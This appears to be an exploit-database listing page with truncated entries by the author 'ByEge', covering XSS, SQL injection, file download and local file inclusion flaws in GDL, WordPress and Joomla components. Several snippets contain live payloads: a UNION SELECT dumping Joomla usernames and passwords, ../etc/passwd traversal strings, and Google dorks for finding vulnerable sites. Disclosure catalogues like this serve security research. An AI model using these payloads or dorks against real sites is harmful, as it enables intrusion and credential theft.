Cross site scripting

Cross-site scripting XSS vulnerability in module/search/function.php in Ganesha Digital Library GDL 4.2 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter in a ByEge action...

CVE-2014-100030

Cross-site scripting XSS vulnerability in module/search/function.php in Ganesha Digital Library GDL 4.2 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter in a ByEge action...

CVE-2014-100030

CVE-2014-100030 describes an XSS vulnerability in the Ganesha Digital Library (GDL) 4.2. The flaw is in the file module/search/function.php and allows remote attackers to inject arbitrary web script or HTML via the keyword parameter in a ByEge action. The available sources indicate the affected s...

GDL 4.2 - Multiple Vulnerabilities

GDL version 4.2 suffers from cross site scripting, remote SQL injection, and directory traversal vulnerabilities. - Title : GDL 4.2 Multiple Vulnerabilities - Down. Script : http://kmrg.itb.ac.id/ - http://kmrg.itb.ac.id/gdl42.zip - Author : ByEge - Home : http://byege.blogspot.com.tr/ - Tested :...

Wordpress wp-FileManager Arbitrary File Download Vulnerability

Exploit for php platform in category web applications Title: Wordpress wp-FileManager Local File Download Vulnerability Author: ByEge Download: http://wordpress.org/extend/plugins/wp-filemanager/ Test Platform: Linux Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg Vuln. Plat.: Web Application...

WordPress wp-FileManager File Download

Title: Wordpress wp-FileManager Local File Download Vulnerability Author: ByEge Download: http://wordpress.org/extend/plugins/wp-filemanager/ Test Platform: Linux Images: http://j1305.hizliresim.com/19/f/n0xxf.jpg Vuln. Plat.: Web Application Google Dorks: inurl:wp-content/plugins/wp-filemanager/...

Joomla! Component com_rsfiles - cid SQL Injection

Joomla! Component comrsfiles - cid SQL Injection Title : Joomla Component RSfiles = cid SQL injection Vulnerability Author : ByEge Contact : http://byege.blogspot.com Date : 18.03.2013 S.Page : http://www.rsjoomla.com Dork : inurl:index.php?option=comrsfiles DorkEx :...

Joomla! Component com_rsfiles - 'cid' SQL Injection

Title : Joomla Component RSfiles = cid SQL injection Vulnerability Author : ByEge Contact : http://byege.blogspot.com Date : 18.03.2013 S.Page : http://www.rsjoomla.com Dork : inurl:index.php?option=comrsfiles DorkEx :...

Joomla RSfiles SQL Injection

Title : Joomla Component RSfiles = cid SQL injection Vulnerability Author : ByEge Contact : http://byege.blogspot.com Date : 18.03.2013 S.Page : http://www.rsjoomla.com Dork : inurl:index.php?option=comrsfiles DorkEx :...

Joomla Component com_lead SQL Injection Vulnerability

Exploit for php platform in category web applications ===================================================== Joomla Component comlead SQL Injection Vulnerability ===================================================== TR Title: Joomla Component comlead SQL Injection TR Date: 03.06.2010 TR Author:...

Joomla! Component com_lead - SQL Injection

TR Title: Joomla Component comlead SQL Injection TR Date: 03.06.2010 TR Author: ByEge TR Homepage: byege.blogspot.com TR Vendor: http://www.leadya.co.il/ TR ExploiT : TR index.php?option=comlead&task=display&archive=1&Itemid=65&leadstatus=1' TR column number : 14 TR column name : username ,...

Webloader 8 - SQL Injection

Webloader 8 - SQL Injection Title: Webloader v8 SQL Injection Vulnerability Date: 16.05.2010 Script Home: www.webloader.org Author: ByEge Homepage: byege.blogspot.com vidgoster.php Bug code : Example : http://site.com/vidgoster.php?vid=1' Th4nks : Fantastik, MitolocyA, ISYAN,...

Joomla Classifieds SQL Injection

! Title: Joomla Component comclassifieds subcategory SQL Injection ! Date: 16.05.2010 ! Author: ByEge ! Homepage: byege.blogspot.com ++ ! ExploiT : 0+and+1=2+UnioN//SeLeCT//concatwsusername,0x3a,password//from//josusers//-- ! Example :...

Joomla Product Local File Inclusion

! Title: Joomla Component comproduct LFI Vulnerability ! Date: 16.05.2010 ! Author: ByEge ! Homepage: byege.blogspot.com ++ ! ExploiT : index.php?option=comproduct&controller=LFI ! Example : http://localhost.free/index.php?option=comproduct&controller=../../../../../../etc/passwd%00 ++ ! Th4nks :...

Joomla! Component com_crowdsource - SQL Injection

Joomla! Component comcrowdsource - SQL Injection ! Title: Joomla Component comcrowdsource SQL Injection ! Date: 16.05.2010 ! Author: ByEge ! Homepage: byege.blogspot.com ++ ! ExploiT :...

Joomla RWCards Local File Inclusion

Joomla Component comrwcards LFI Vulnerability Author: ByEge site : byege.blogspot.com Scrip : Joomla Download link : http://www.weberr.de/index.php/downloads-mainmenu-27/docdownload/56-rwcards-3018.html exploit : http://localhost/index.php?option=comrwcards&controller=../../../../../../etc/passwd...